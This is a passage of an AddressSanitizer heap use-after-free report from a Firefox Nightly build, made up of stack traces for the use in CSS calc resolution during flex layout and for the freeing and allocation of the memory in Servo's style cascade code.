    #0 0x1154ec20c in int mozilla::StyleGenericCalcNode&lt;mozilla::StyleCalcLengthPercentageLeaf&gt;::ResolveInternal&lt;int, int (*)(float)&gt;(int, int (*)(float)) const+0x66c (/Users/zx/Documents/GitHub/codeql/codeql_cpp/chrome/browser/firefox/Nightly.app/Contents/MacOS/XUL:x86_64+0xaedb20c)
    #1 0x1158a1c98 in nsIFrame::ComputeSize(gfxContext*, mozilla::WritingMode, mozilla::LogicalSize const&amp;, int, mozilla::LogicalSize const&amp;, mozilla::LogicalSize const&amp;, mozilla::EnumSet&lt;mozilla::ComputeSizeFlag, unsigned char&gt;)+0x27e8 (/Users/zx/Documents/GitHub/codeql/codeql_cpp/chrome/browser/firefox/Nightly.app/Contents/MacOS/XUL:x86_64+0xb290c98)
    #2 0x1157ba61f in mozilla::ReflowInput::InitConstraints(nsPresContext*, mozilla::Maybe&lt;mozilla::LogicalSize&gt; const&amp;, mozilla::Maybe&lt;mozilla::LogicalMargin&gt; const&amp;, mozilla::Maybe&lt;mozilla::LogicalMargin&gt; const&amp;, mozilla::LayoutFrameType)+0x220f (/Users/zx/Documents/GitHub/codeql/codeql_cpp/chrome/browser/firefox/Nightly.app/Contents/MacOS/XUL:x86_64+0xb1a961f)
    #3 0x1157b2ee6 in mozilla::ReflowInput::Init(nsPresContext*, mozilla::Maybe&lt;mozilla::LogicalSize&gt; const&amp;, mozilla::Maybe&lt;mozilla::LogicalMargin&gt; const&amp;, mozilla::Maybe&lt;mozilla::LogicalMargin&gt; const&amp;)+0x5a6 (/Users/zx/Documents/GitHub/codeql/codeql_cpp/chrome/browser/firefox/Nightly.app/Contents/MacOS/XUL:x86_64+0xb1a1ee6)
    #4 0x1157b4b40 in mozilla::ReflowInput::ReflowInput(nsPresContext*, mozilla::ReflowInput const&amp;, nsIFrame*, mozilla::LogicalSize const&amp;, mozilla::Maybe&lt;mozilla::LogicalSize&gt; const&amp;, mozilla::EnumSet&lt;mozilla::ReflowInput::InitFlag, unsigned char&gt;, mozilla::EnumSet&lt;mozilla::ComputeSizeFlag, unsigned char&gt;)+0x8c0 (/Users/zx/Documents/GitHub/codeql/codeql_cpp/chrome/browser/firefox/Nightly.app/Contents/MacOS/XUL:x86_64+0xb1a3b40)
    #5 0x1158a7bec in nsFlexContainerFrame::GenerateFlexItemForChild(nsFlexContainerFrame::FlexLine&amp;, nsIFrame*, mozilla::ReflowInput const&amp;, nsFlexContainerFrame::FlexboxAxisTracker const&amp;, bool)+0x2ac (/Users/zx/Documents/GitHub/codeql/codeql_cpp/chrome/browser/firefox/Nightly.app/Contents/MacOS/XUL:x86_64+0xb296bec)
    #6 0x1158bc75b in nsFlexContainerFrame::GenerateFlexLines(mozilla::ReflowInput const&amp;, int, nsTArray&lt;nsFlexContainerFrame::StrutInfo&gt; const&amp;, nsFlexContainerFrame::FlexboxAxisTracker const&amp;, int, bool, nsTArray&lt;nsIFrame*&gt;&amp;, nsTArray&lt;nsFlexContainerFrame::FlexLine&gt;&amp;)+0x12fb (/Users/zx/Documents/GitHub/codeql/codeql_cpp/chrome/browser/firefox/Nightly.app/Contents/MacOS/XUL:x86_64+0xb2ab75b)
    #7 0x1158c4c81 in nsFlexContainerFrame::DoFlexLayout(mozilla::ReflowInput const&amp;, int&amp;, int&amp;, int&amp;, nsTArray&lt;nsFlexContainerFrame::FlexLine&gt;&amp;, nsTArray&lt;nsFlexContainerFrame::StrutInfo&gt;&amp;, nsTArray&lt;nsIFrame*&gt;&amp;, nsFlexContainerFrame::FlexboxAxisTracker const&amp;, int, int, int, bool, ComputedFlexContainerInfo*)+0x161 (/Users/zx/Documents/GitHub/codeql/codeql_cpp/chrome/browser/firefox/Nightly.app/Contents/MacOS/XUL:x86_64+0xb2b3c81)
    #8 0x1158c100c in nsFlexContainerFrame::Reflow(nsPresContext*, mozilla::ReflowOutput&amp;, mozilla::ReflowInput const&amp;, nsReflowStatus&amp;)+0xb2c (/Users/zx/Documents/GitHub/codeql/codeql_cpp/chrome/browser/firefox/Nightly.app/Contents/MacOS/XUL:x86_64+0xb2b000c)
    #9 0x115ae5bf9 in nsLineLayout::ReflowFrame(nsIFrame*, nsReflowStatus&amp;, mozilla::ReflowOutput*, bool&amp;)+0x1d49 (/Users/zx/Documents/GitHub/codeql/codeql_cpp/chrome/browser/firefox/Nightly.app/Contents/MacOS/XUL:x86_64+0xb4d4bf9)
    #10 0x1158284b4 in nsBlockFrame::ReflowInlineFrame(mozilla::BlockReflowInput&amp;, nsLineLayout&amp;, nsLineList_iterator, nsIFrame*, LineReflowStatus*)+0x214 (/Users/zx/Documents/GitHub/codeql/codeql_cpp/chrome/browser/firefox/Nightly.app/Contents/MacOS/XUL:x86_64+0xb2174b4)
    #11 0x115826da2 in nsBlockFrame::DoReflowInlineFrames(mozilla::BlockReflowInput&amp;, nsLineLayout&amp;, nsLineList_iterator, nsFlowAreaRect&amp;, int&amp;, nsFloatManager::SavedState*, bool*, LineReflowStatus*, bool)+0x4a2 (/Users/zx/Documents/GitHub/codeql/codeql_cpp/chrome/browser/firefox/Nightly.app/Contents/MacOS/XUL:x86_64+0xb215da2)
    #12 0x11581fc6d in nsBlockFrame::ReflowInlineFrames(mozilla::BlockReflowInput&amp;, nsLineList_iterator, bool*)+0x7fd (/Users/zx/Documents/GitHub/codeql/codeql_cpp/chrome/browser/firefox/Nightly.app/Contents/MacOS/XUL:x86_64+0xb20ec6d)
    #13 0x115818d9c in nsBlockFrame::ReflowLine(mozilla::BlockReflowInput&amp;, nsLineList_iterator, bool*)+0x13c (/Users/zx/Documents/GitHub/codeql/codeql_cpp/chrome/browser/firefox/Nightly.app/Contents/MacOS/XUL:x86_64+0xb207d9c)
    #14 0x11580ca85 in nsBlockFrame::ReflowDirtyLines(mozilla::BlockReflowInput&amp;)+0x16b5 (/Users/zx/Documents/GitHub/codeql/codeql_cpp/chrome/browser/firefox/Nightly.app/Contents/MacOS/XUL:x86_64+0xb1fba85)
    #15 0x115804af3 in nsBlockFrame::Reflow(nsPresContext*, mozilla::ReflowOutput&amp;, mozilla::ReflowInput const&amp;, nsReflowStatus&amp;)+0x14c3 (/Users/zx/Documents/GitHub/codeql/codeql_cpp/chrome/browser/firefox/Nightly.app/Contents/MacOS/XUL:x86_64+0xb1f3af3)
    #16 0x11588239b in nsContainerFrame::ReflowChild(nsIFrame*, nsPresContext*, mozilla::ReflowOutput&amp;, mozilla::ReflowInput const&amp;, mozilla::WritingMode const&amp;, mozilla::LogicalPoint const&amp;, nsSize const&amp;, nsIFrame::ReflowChildFlags, nsReflowStatus&amp;, nsOverflowContinuationTracker*)+0x43b (/Users/zx/Documents/GitHub/codeql/codeql_cpp/chrome/browser/firefox/Nightly.app/Contents/MacOS/XUL:x86_64+0xb27139b)
    #17 0x11585861b in nsCanvasFrame::Reflow(nsPresContext*, mozilla::ReflowOutput&amp;, mozilla::ReflowInput const&amp;, nsReflowStatus&amp;)+0x122b (/Users/zx/Documents/GitHub/codeql/codeql_cpp/chrome/browser/firefox/Nightly.app/Contents/MacOS/XUL:x86_64+0xb24761b)
    #18 0x115919390 in nsHTMLScrollFrame::ReflowScrolledFrame(mozilla::ScrollReflowInput*, bool, bool, mozilla::ReflowOutput*)+0x1420 (/Users/zx/Documents/GitHub/codeql/codeql_cpp/chrome/browser/firefox/Nightly.app/Contents/MacOS/XUL:x86_64+0xb308390)
    #19 0x11591b490 in nsHTMLScrollFrame::ReflowContents(mozilla::ScrollReflowInput*, mozilla::ReflowOutput const&amp;)+0x320 (/Users/zx/Documents/GitHub/codeql/codeql_cpp/chrome/browser/firefox/Nightly.app/Contents/MacOS/XUL:x86_64+0xb30a490)
    #20 0x115927e6a in nsHTMLScrollFrame::Reflow(nsPresContext*, mozilla::ReflowOutput&amp;, mozilla::ReflowInput const&amp;, nsReflowStatus&amp;)+0xd8a (/Users/zx/Documents/GitHub/codeql/codeql_cpp/chrome/browser/firefox/Nightly.app/Contents/MacOS/XUL:x86_64+0xb316e6a)
    #21 0x115883345 in nsContainerFrame::ReflowChild(nsIFrame*, nsPresContext*, mozilla::ReflowOutput&amp;, mozilla::ReflowInput const&amp;, int, int, nsIFrame::ReflowChildFlags, nsReflowStatus&amp;, nsOverflowContinuationTracker*)+0x335 (/Users/zx/Documents/GitHub/codeql/codeql_cpp/chrome/browser/firefox/Nightly.app/Contents/MacOS/XUL:x86_64+0xb272345)
    #22 0x1157f4b02 in mozilla::ViewportFrame::Reflow(nsPresContext*, mozilla::ReflowOutput&amp;, mozilla::ReflowInput const&amp;, nsReflowStatus&amp;)+0x642 (/Users/zx/Documents/GitHub/codeql/codeql_cpp/chrome/browser/firefox/Nightly.app/Contents/MacOS/XUL:x86_64+0xb1e3b02)
    #23 0x1155a66a4 in mozilla::PresShell::DoReflow(nsIFrame*, bool, mozilla::OverflowChangedTracker*)+0x1ac4 (/Users/zx/Documents/GitHub/codeql/codeql_cpp/chrome/browser/firefox/Nightly.app/Contents/MacOS/XUL:x86_64+0xaf956a4)
    #24 0x1155be1f8 in mozilla::PresShell::ProcessReflowCommands(bool)+0x478 (/Users/zx/Documents/GitHub/codeql/codeql_cpp/chrome/browser/firefox/Nightly.app/Contents/MacOS/XUL:x86_64+0xafad1f8)
    #25 0x1155bc258 in mozilla::PresShell::DoFlushPendingNotifications(mozilla::ChangesToFlush)+0x1ba8 (/Users/zx/Documents/GitHub/codeql/codeql_cpp/chrome/browser/firefox/Nightly.app/Contents/MacOS/XUL:x86_64+0xafab258)
    #26 0x11552e136 in nsRefreshDriver::Tick(mozilla::layers::BaseTransactionId&lt;mozilla::VsyncIdType&gt;, mozilla::TimeStamp)+0x2b36 (/Users/zx/Documents/GitHub/codeql/codeql_cpp/chrome/browser/firefox/Nightly.app/Contents/MacOS/XUL:x86_64+0xaf1d136)
    #27 0x115541903 in mozilla::RefreshDriverTimer::TickRefreshDrivers(mozilla::layers::BaseTransactionId&lt;mozilla::VsyncIdType&gt;, mozilla::TimeStamp, nsTArray&lt;RefPtr&lt;nsRefreshDriver&gt; &gt;&amp;)+0x213 (/Users/zx/Documents/GitHub/codeql/codeql_cpp/chrome/browser/firefox/Nightly.app/Contents/MacOS/XUL:x86_64+0xaf30903)
    #28 0x1155415e8 in mozilla::RefreshDriverTimer::Tick(mozilla::layers::BaseTransactionId&lt;mozilla::VsyncIdType&gt;, mozilla::TimeStamp)+0xc8 (/Users/zx/Documents/GitHub/codeql/codeql_cpp/chrome/browser/firefox/Nightly.app/Contents/MacOS/XUL:x86_64+0xaf305e8)
    #29 0x115540a4c in mozilla::VsyncRefreshDriverTimer::RefreshDriverVsyncObserver::TickRefreshDriver(mozilla::layers::BaseTransactionId&lt;mozilla::VsyncIdType&gt;, mozilla::TimeStamp)+0x1cc (/Users/zx/Documents/GitHub/codeql/codeql_cpp/chrome/browser/firefox/Nightly.app/Contents/MacOS/XUL:x86_64+0xaf2fa4c)
    #30 0x11553fd1e in mozilla::VsyncRefreshDriverTimer::RefreshDriverVsyncObserver::NotifyParentProcessVsync()+0x76e (/Users/zx/Documents/GitHub/codeql/codeql_cpp/chrome/browser/firefox/Nightly.app/Contents/MacOS/XUL:x86_64+0xaf2ed1e)
    #31 0x11553f302 in mozilla::VsyncRefreshDriverTimer::RefreshDriverVsyncObserver::NotifyVsync(mozilla::VsyncEvent const&amp;)+0x92 (/Users/zx/Documents/GitHub/codeql/codeql_cpp/chrome/browser/firefox/Nightly.app/Contents/MacOS/XUL:x86_64+0xaf2e302)
    #32 0x1141fb81d in mozilla::dom::VsyncChild::RecvNotify(mozilla::VsyncEvent const&amp;, float const&amp;)+0x2cd (/Users/zx/Documents/GitHub/codeql/codeql_cpp/chrome/browser/firefox/Nightly.app/Contents/MacOS/XUL:x86_64+0x9bea81d)
    #33 0x10cc7cb92 in mozilla::dom::PVsyncChild::OnMessageReceived(IPC::Message const&amp;)+0x4f2 (/Users/zx/Documents/GitHub/codeql/codeql_cpp/chrome/browser/firefox/Nightly.app/Contents/MacOS/XUL:x86_64+0x266bb92)
    #34 0x10c6dc9af in mozilla::ipc::PBackgroundChild::OnMessageReceived(IPC::Message const&amp;)+0x35f (/Users/zx/Documents/GitHub/codeql/codeql_cpp/chrome/browser/firefox/Nightly.app/Contents/MacOS/XUL:x86_64+0x20cb9af)
    #35 0x10bf097f8 in mozilla::ipc::MessageChannel::DispatchAsyncMessage(mozilla::ipc::ActorLifecycleProxy*, IPC::Message const&amp;)+0x1e8 (/Users/zx/Documents/GitHub/codeql/codeql_cpp/chrome/browser/firefox/Nightly.app/Contents/MacOS/XUL:x86_64+0x18f87f8)
    #36 0x10bf0471d in mozilla::ipc::MessageChannel::DispatchMessage(IPC::Message&amp;&amp;)+0x71d (/Users/zx/Documents/GitHub/codeql/codeql_cpp/chrome/browser/firefox/Nightly.app/Contents/MacOS/XUL:x86_64+0x18f371d)
    #37 0x10bf06f36 in mozilla::ipc::MessageChannel::RunMessage(mozilla::ipc::MessageChannel::MessageTask&amp;)+0x586 (/Users/zx/Documents/GitHub/codeql/codeql_cpp/chrome/browser/firefox/Nightly.app/Contents/MacOS/XUL:x86_64+0x18f5f36)
    #38 0x10bf07ca1 in mozilla::ipc::MessageChannel::MessageTask::Run()+0x101 (/Users/zx/Documents/GitHub/codeql/codeql_cpp/chrome/browser/firefox/Nightly.app/Contents/MacOS/XUL:x86_64+0x18f6ca1)
    #39 0x10a9b8177 in mozilla::RunnableTask::Run()+0x347 (/Users/zx/Documents/GitHub/codeql/codeql_cpp/chrome/browser/firefox/Nightly.app/Contents/MacOS/XUL:x86_64+0x3a7177)
    #40 0x10a9b343a in mozilla::TaskController::DoExecuteNextTaskOnlyMainThreadInternal(mozilla::detail::BaseAutoLock&lt;mozilla::Mutex&amp;&gt; const&amp;)+0x107a (/Users/zx/Documents/GitHub/codeql/codeql_cpp/chrome/browser/firefox/Nightly.app/Contents/MacOS/XUL:x86_64+0x3a243a)
    #41 0x10a9b095e in mozilla::TaskController::ExecuteNextTaskOnlyMainThreadInternal(mozilla::detail::BaseAutoLock&lt;mozilla::Mutex&amp;&gt; const&amp;)+0xae (/Users/zx/Documents/GitHub/codeql/codeql_cpp/chrome/browser/firefox/Nightly.app/Contents/MacOS/XUL:x86_64+0x39f95e)
    #42 0x10a9b0f67 in mozilla::TaskController::ProcessPendingMTTask(bool)+0xf7 (/Users/zx/Documents/GitHub/codeql/codeql_cpp/chrome/browser/firefox/Nightly.app/Contents/MacOS/XUL:x86_64+0x39ff67)
    #43 0x10a9bf981 in mozilla::detail::RunnableFunction&lt;mozilla::TaskController::InitializeInternal()::$_4&gt;::Run()+0x11 (/Users/zx/Documents/GitHub/codeql/codeql_cpp/chrome/browser/firefox/Nightly.app/Contents/MacOS/XUL:x86_64+0x3ae981)
    #44 0x10a9e2d45 in nsThread::ProcessNextEvent(bool, bool*)+0x13d5 (/Users/zx/Documents/GitHub/codeql/codeql_cpp/chrome/browser/firefox/Nightly.app/Contents/MacOS/XUL:x86_64+0x3d1d45)
    #45 0x10a9eee4d in NS_ProcessNextEvent(nsIThread*, bool)+0x11d (/Users/zx/Documents/GitHub/codeql/codeql_cpp/chrome/browser/firefox/Nightly.app/Contents/MacOS/XUL:x86_64+0x3dde4d)
    #46 0x10bf1496e in mozilla::ipc::MessagePump::Run(base::MessagePump::Delegate*)+0x40e (/Users/zx/Documents/GitHub/codeql/codeql_cpp/chrome/browser/firefox/Nightly.app/Contents/MacOS/XUL:x86_64+0x190396e)
    #47 0x10bdf3ec2 in MessageLoop::Run()+0x1d2 (/Users/zx/Documents/GitHub/codeql/codeql_cpp/chrome/browser/firefox/Nightly.app/Contents/MacOS/XUL:x86_64+0x17e2ec2)
    #48 0x114e343ff in nsBaseAppShell::Run()+0x4f (/Users/zx/Documents/GitHub/codeql/codeql_cpp/chrome/browser/firefox/Nightly.app/Contents/MacOS/XUL:x86_64+0xa8233ff)
    #49 0x114f8d24c in nsAppShell::Run()+0x3cc (/Users/zx/Documents/GitHub/codeql/codeql_cpp/chrome/browser/firefox/Nightly.app/Contents/MacOS/XUL:x86_64+0xa97c24c)
    #50 0x118eaa71e in XRE_RunAppShell()+0x28e (/Users/zx/Documents/GitHub/codeql/codeql_cpp/chrome/browser/firefox/Nightly.app/Contents/MacOS/XUL:x86_64+0xe89971e)
    #51 0x10bdf3ec2 in MessageLoop::Run()+0x1d2 (/Users/zx/Documents/GitHub/codeql/codeql_cpp/chrome/browser/firefox/Nightly.app/Contents/MacOS/XUL:x86_64+0x17e2ec2)
    #52 0x118ea9b94 in XRE_InitChildProcess(int, char**, XREChildData const*)+0xf94 (/Users/zx/Documents/GitHub/codeql/codeql_cpp/chrome/browser/firefox/Nightly.app/Contents/MacOS/XUL:x86_64+0xe898b94)
    #53 0x10944bd06 in main+0x1b6 (/Users/zx/Documents/GitHub/codeql/codeql_cpp/chrome/browser/firefox/Nightly.app/Contents/MacOS/plugin-container.app/Contents/MacOS/plugin-container:x86_64+0x100000d06)
    #54 0x7fff6d7a5cc8 in start+0x0 (/usr/lib/system/libdyld.dylib:x86_64+0x1acc8)
0x6190002ce398 is located 280 bytes inside of 1024-byte region [0x6190002ce280,0x6190002ce680)
freed by thread T0 here:
    #0 0x12ba47cd6 in wrap_free+0xa6 (/Users/zx/Documents/GitHub/codeql/codeql_cpp/chrome/browser/firefox/Nightly.app/Contents/MacOS/libclang_rt.asan_osx_dynamic.dylib:x86_64+0x46cd6)
    #1 0x11b951387 in style::properties::cascade::cascade_rules::h088ae32ca5ec9019+0xf97 (/Users/zx/Documents/GitHub/codeql/codeql_cpp/chrome/browser/firefox/Nightly.app/Contents/MacOS/XUL:x86_64+0x11340387)
    #2 0x11b96b596 in style::stylist::Stylist::cascade_style_and_visited::h8d1d544df7954eb4+0x96 (/Users/zx/Documents/GitHub/codeql/codeql_cpp/chrome/browser/firefox/Nightly.app/Contents/MacOS/XUL:x86_64+0x1135a596)
    #3 0x11b9be1ab in Servo_ComputedValues_GetForAnonymousBox+0x3cb (/Users/zx/Documents/GitHub/codeql/codeql_cpp/chrome/browser/firefox/Nightly.app/Contents/MacOS/XUL:x86_64+0x113ad1ab)
    #4 0x115442252 in mozilla::ServoStyleSet::ResolveInheritingAnonymousBoxStyle(mozilla::PseudoStyleType, mozilla::ComputedStyle*)+0x92 (/Users/zx/Documents/GitHub/codeql/codeql_cpp/chrome/browser/firefox/Nightly.app/Contents/MacOS/XUL:x86_64+0xae31252)
    #5 0x11565855c in nsCSSFrameConstructor::ConstructTable(nsFrameConstructorState&amp;, nsCSSFrameConstructor::FrameConstructionItem&amp;, nsContainerFrame*, nsStyleDisplay const*, nsFrameList&amp;)+0x1bc (/Users/zx/Documents/GitHub/codeql/codeql_cpp/chrome/browser/firefox/Nightly.app/Contents/MacOS/XUL:x86_64+0xb04755c)
    #6 0x115670c95 in nsCSSFrameConstructor::ConstructFrameFromItemInternal(nsCSSFrameConstructor::FrameConstructionItem&amp;, nsFrameConstructorState&amp;, nsContainerFrame*, nsFrameList&amp;)+0x3b5 (/Users/zx/Documents/GitHub/codeql/codeql_cpp/chrome/browser/firefox/Nightly.app/Contents/MacOS/XUL:x86_64+0xb05fc95)
    #7 0x11567b5ed in nsCSSFrameConstructor::ConstructFramesFromItem(nsFrameConstructorState&amp;, nsCSSFrameConstructor::FrameConstructionItemList::Iterator&amp;, nsContainerFrame*, nsFrameList&amp;)+0xcd (/Users/zx/Documents/GitHub/codeql/codeql_cpp/chrome/browser/firefox/Nightly.app/Contents/MacOS/XUL:x86_64+0xb06a5ed)
    #8 0x1156597b6 in nsCSSFrameConstructor::ConstructFramesFromItemList(nsFrameConstructorState&amp;, nsCSSFrameConstructor::FrameConstructionItemList&amp;, nsContainerFrame*, bool, nsFrameList&amp;)+0x2e6 (/Users/zx/Documents/GitHub/codeql/codeql_cpp/chrome/browser/firefox/Nightly.app/Contents/MacOS/XUL:x86_64+0xb0487b6)
    #9 0x11565a732 in nsCSSFrameConstructor::ProcessChildren(nsFrameConstructorState&amp;, nsIContent*, mozilla::ComputedStyle*, nsContainerFrame*, bool, nsFrameList&amp;, bool, nsIFrame*)+0xd02 (/Users/zx/Documents/GitHub/codeql/codeql_cpp/chrome/browser/firefox/Nightly.app/Contents/MacOS/XUL:x86_64+0xb049732)
    #10 0x115671d9e in nsCSSFrameConstructor::ConstructFrameFromItemInternal(nsCSSFrameConstructor::FrameConstructionItem&amp;, nsFrameConstructorState&amp;, nsContainerFrame*, nsFrameList&amp;)+0x14be (/Users/zx/Documents/GitHub/codeql/codeql_cpp/chrome/browser/firefox/Nightly.app/Contents/MacOS/XUL:x86_64+0xb060d9e)
    #11 0x11567b5ed in nsCSSFrameConstructor::ConstructFramesFromItem(nsFrameConstructorState&amp;, nsCSSFrameConstructor::FrameConstructionItemList::Iterator&amp;, nsContainerFrame*, nsFrameList&amp;)+0xcd (/Users/zx/Documents/GitHub/codeql/codeql_cpp/chrome/browser/firefox/Nightly.app/Contents/MacOS/XUL:x86_64+0xb06a5ed)
    #12 0x1156597b6 in nsCSSFrameConstructor::ConstructFramesFromItemList(nsFrameConstructorState&amp;, nsCSSFrameConstructor::FrameConstructionItemList&amp;, nsContainerFrame*, bool, nsFrameList&amp;)+0x2e6 (/Users/zx/Documents/GitHub/codeql/codeql_cpp/chrome/browser/firefox/Nightly.app/Contents/MacOS/XUL:x86_64+0xb0487b6)
    #13 0x11565a732 in nsCSSFrameConstructor::ProcessChildren(nsFrameConstructorState&amp;, nsIContent*, mozilla::ComputedStyle*, nsContainerFrame*, bool, nsFrameList&amp;, bool, nsIFrame*)+0xd02 (/Users/zx/Documents/GitHub/codeql/codeql_cpp/chrome/browser/firefox/Nightly.app/Contents/MacOS/XUL:x86_64+0xb049732)
    #14 0x115664983 in nsCSSFrameConstructor::ConstructBlock(nsFrameConstructorState&amp;, nsIContent*, nsContainerFrame*, nsContainerFrame*, mozilla::ComputedStyle*, nsContainerFrame**, nsFrameList&amp;, nsIFrame*)+0x7f3 (/Users/zx/Documents/GitHub/codeql/codeql_cpp/chrome/browser/firefox/Nightly.app/Contents/MacOS/XUL:x86_64+0xb053983)
    #15 0x115660842 in nsCSSFrameConstructor::ConstructDocElementFrame(mozilla::dom::Element*)+0x2a92 (/Users/zx/Documents/GitHub/codeql/codeql_cpp/chrome/browser/firefox/Nightly.app/Contents/MacOS/XUL:x86_64+0xb04f842)
    #16 0x11568331b in nsCSSFrameConstructor::ContentRangeInserted(nsIContent*, nsIContent*, nsCSSFrameConstructor::InsertionKind)+0x3eb (/Users/zx/Documents/GitHub/codeql/codeql_cpp/chrome/browser/firefox/Nightly.app/Contents/MacOS/XUL:x86_64+0xb07231b)
    #17 0x1155a145a in mozilla::PresShell::Initialize()+0x40a (/Users/zx/Documents/GitHub/codeql/codeql_cpp/chrome/browser/firefox/Nightly.app/Contents/MacOS/XUL:x86_64+0xaf9045a)
    #18 0x10f0f773c in nsContentSink::StartLayout(bool)+0x8bc (/Users/zx/Documents/GitHub/codeql/codeql_cpp/chrome/browser/firefox/Nightly.app/Contents/MacOS/XUL:x86_64+0x4ae673c)
    #19 0x10d768178 in nsHtml5TreeOpExecutor::StartLayout(bool*)+0x128 (/Users/zx/Documents/GitHub/codeql/codeql_cpp/chrome/browser/firefox/Nightly.app/Contents/MacOS/XUL:x86_64+0x3157178)
    #20 0x10d7630ec in nsHtml5TreeOperation::Perform(nsHtml5TreeOpExecutor*, nsIContent**, bool*, bool*)+0x1fcc (/Users/zx/Documents/GitHub/codeql/codeql_cpp/chrome/browser/firefox/Nightly.app/Contents/MacOS/XUL:x86_64+0x31520ec)
    #21 0x10d760269 in nsHtml5TreeOpExecutor::RunFlushLoop()+0x9f9 (/Users/zx/Documents/GitHub/codeql/codeql_cpp/chrome/browser/firefox/Nightly.app/Contents/MacOS/XUL:x86_64+0x314f269)
    #22 0x10d76d00f in nsHtml5ExecutorFlusher::Run()+0x3cf (/Users/zx/Documents/GitHub/codeql/codeql_cpp/chrome/browser/firefox/Nightly.app/Contents/MacOS/XUL:x86_64+0x315c00f)
    #23 0x10a9aa1e0 in mozilla::SchedulerGroup::Runnable::Run()+0x80 (/Users/zx/Documents/GitHub/codeql/codeql_cpp/chrome/browser/firefox/Nightly.app/Contents/MacOS/XUL:x86_64+0x3991e0)
    #24 0x10a9b8177 in mozilla::RunnableTask::Run()+0x347 (/Users/zx/Documents/GitHub/codeql/codeql_cpp/chrome/browser/firefox/Nightly.app/Contents/MacOS/XUL:x86_64+0x3a7177)
    #25 0x10a9b343a in mozilla::TaskController::DoExecuteNextTaskOnlyMainThreadInternal(mozilla::detail::BaseAutoLock&lt;mozilla::Mutex&amp;&gt; const&amp;)+0x107a (/Users/zx/Documents/GitHub/codeql/codeql_cpp/chrome/browser/firefox/Nightly.app/Contents/MacOS/XUL:x86_64+0x3a243a)
    #26 0x10a9b0b6e in mozilla::TaskController::ExecuteNextTaskOnlyMainThreadInternal(mozilla::detail::BaseAutoLock&lt;mozilla::Mutex&amp;&gt; const&amp;)+0x2be (/Users/zx/Documents/GitHub/codeql/codeql_cpp/chrome/browser/firefox/Nightly.app/Contents/MacOS/XUL:x86_64+0x39fb6e)
    #27 0x10a9b0f67 in mozilla::TaskController::ProcessPendingMTTask(bool)+0xf7 (/Users/zx/Documents/GitHub/codeql/codeql_cpp/chrome/browser/firefox/Nightly.app/Contents/MacOS/XUL:x86_64+0x39ff67)
    #28 0x10a9bf981 in mozilla::detail::RunnableFunction&lt;mozilla::TaskController::InitializeInternal()::$_4&gt;::Run()+0x11 (/Users/zx/Documents/GitHub/codeql/codeql_cpp/chrome/browser/firefox/Nightly.app/Contents/MacOS/XUL:x86_64+0x3ae981)
    #29 0x10a9e2d45 in nsThread::ProcessNextEvent(bool, bool*)+0x13d5 (/Users/zx/Documents/GitHub/codeql/codeql_cpp/chrome/browser/firefox/Nightly.app/Contents/MacOS/XUL:x86_64+0x3d1d45)
previously allocated by thread T0 here:
    #0 0x12ba47b8d in wrap_malloc+0x9d (/Users/zx/Documents/GitHub/codeql/codeql_cpp/chrome/browser/firefox/Nightly.app/Contents/MacOS/libclang_rt.asan_osx_dynamic.dylib:x86_64+0x46b8d)
    #1 0x11b94cc6e in smallvec::SmallVec$LT$A$GT$::push::ha7920bdc965a65bc+0x28e (/Users/zx/Documents/GitHub/codeql/codeql_cpp/chrome/browser/firefox/Nightly.app/Contents/MacOS/XUL:x86_64+0x1133bc6e)
    #2 0x11b950cae in style::properties::cascade::cascade_rules::h088ae32ca5ec9019+0x8be (/Users/zx/Documents/GitHub/codeql/codeql_cpp/chrome/browser/firefox/Nightly.app/Contents/MacOS/XUL:x86_64+0x1133fcae)
    #3 0x11b96b596 in style::stylist::Stylist::cascade_style_and_visited::h8d1d544df7954eb4+0x96 (/Users/zx/Documents/GitHub/codeql/codeql_cpp/chrome/browser/firefox/Nightly.app/Contents/MacOS/XUL:x86_64+0x1135a596)
    #4 0x11b9be1ab in Servo_ComputedValues_GetForAnonymousBox+0x3cb (/Users/zx/Documents/GitHub/codeql/codeql_cpp/chrome/browser/firefox/Nightly.app/Contents/MacOS/XUL:x86_64+0x113ad1ab)
    #5 0x115442252 in mozilla::ServoStyleSet::ResolveInheritingAnonymousBoxStyle(mozilla::PseudoStyleType, mozilla::ComputedStyle*)+0x92 (/Users/zx/Documents/GitHub/codeql/codeql_cpp/chrome/browser/firefox/Nightly.app/Contents/MacOS/XUL:x86_64+0xae31252)
    #6 0x11565855c in nsCSSFrameConstructor::ConstructTable(nsFrameConstructorState&amp;, nsCSSFrameConstructor::FrameConstructionItem&amp;, nsContainerFrame*, nsStyleDisplay const*, nsFrameList&amp;)+0x1bc (/Users/zx/Documents/GitHub/codeql/codeql_cpp/chrome/browser/firefox/Nightly.app/Contents/MacOS/XUL:x86_64+0xb04755c)
    #7 0x115670c95 in nsCSSFrameConstructor::ConstructFrameFromItemInternal(nsCSSFrameConstructor::FrameConstructionItem&amp;, nsFrameConstructorState&amp;, nsContainerFrame*, nsFrameList&amp;)+0x3b5 (/Users/zx/Documents/GitHub/codeql/codeql_cpp/chrome/browser/firefox/Nightly.app/Contents/MacOS/XUL:x86_64+0xb05fc95)
    #8 0x11567b5ed in nsCSSFrameConstructor::ConstructFramesFromItem(nsFrameConstructorState&amp;, nsCSSFrameConstructor::FrameConstructionItemList::Iterator&amp;, nsContainerFrame*, nsFrameList&amp;)+0xcd (/Users/zx/Documents/GitHub/codeql/codeql_cpp/chrome/browser/firefox/Nightly.app/Contents/MacOS/XUL:x86_64+0xb06a5ed)
    #9 0x1156597b6 in nsCSSFrameConstructor::ConstructFramesFromItemList(nsFrameConstructorState&amp;, nsCSSFrameConstructor::FrameConstructionItemList&amp;, nsContainerFrame*, bool, nsFrameList&amp;)+0x2e6 (/Users/zx/Documents/GitHub/codeql/codeql_cpp/chrome/browser/firefox/Nightly.app/Contents/MacOS/XUL:x86_64+0xb0487b6)
    #10 0x11565a732 in nsCSSFrameConstructor::ProcessChildren(nsFrameConstructorState&amp;, nsIContent*, mozilla::ComputedStyle*, nsContainerFrame*, bool, nsFrameList&amp;, bool, nsIFrame*)+0xd02 (/Users/zx/Documents/GitHub/codeql/codeql_cpp/chrome/browser/firefox/Nightly.app/Contents/MacOS/XUL:x86_64+0xb049732)
    #11 0x115671d9e in nsCSSFrameConstructor::ConstructFrameFromItemInternal(nsCSSFrameConstructor::FrameConstructionItem&amp;, nsFrameConstructorState&amp;, nsContainerFrame*, nsFrameList&amp;)+0x14be (/Users/zx/Documents/GitHub/codeql/codeql_cpp/chrome/browser/firefox/Nightly.app/Contents/MacOS/XUL:x86_64+0xb060d9e)
